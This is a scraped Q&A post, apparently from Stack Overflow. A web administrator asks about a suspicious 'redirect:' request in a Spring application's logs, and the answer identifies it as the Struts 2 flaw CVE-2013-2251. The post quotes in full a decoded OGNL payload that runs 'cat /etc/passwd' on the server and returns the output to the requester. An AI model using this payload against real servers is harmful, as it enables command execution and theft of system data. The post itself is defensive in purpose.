security - Spring "redirect:" EL vulnerability? -


i have public-facing web application uses spring mvc (3.2.x) , spring security (3.1.x). morning observed requests of following form in our access logs:

get /mywebapppath/login.do?redirect:${some url-encoded el code here}

what bug or feature of spring attempting exploit? under conditions spring (or other code) evaluate el expression?

it looks ?redirect: parameter ignored me, makes me nervous because don't know verify i'm not vulnerable. googling has turned unrelated things (as best can tell).

if code inside ${ } had run, have attempted dump contents of /etc/passwd client. (thankfully looks never did run. plus file doesn't exist on our system. , our tomcat runs user limited permissions.)


edit: here actual code inside ${ }, after decoding , adding newlines readability:

#a=(new java.lang.processbuilder(new java.lang.string[]{'cat','/etc/passwd'})).start(), #b=#a.getinputstream(), #c=new java.io.inputstreamreader(#b), #d=new java.io.bufferedreader(#c), #e=new char[50000], #d.read(#e), #matt=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'), #matt.getwriter().println(#e), #matt.getwriter().flush(), #matt.getwriter().close() 

es correcto, esta vulnerabilidad es exclusiva de struts 2, y esta documentada como cve-2013-2251. no tienes de que preocuparte con spring mvc.

that's right, vulnerability exclusive struts 2, , is documented cve-2013-2251. not have worry spring mvc.


Comments

Popular posts from this blog

apache - Remove .php and add trailing slash in url using htaccess not loading css -

inno setup - TLabel or TNewStaticText - change .Font.Style on Focus like Cursor changes with .Cursor -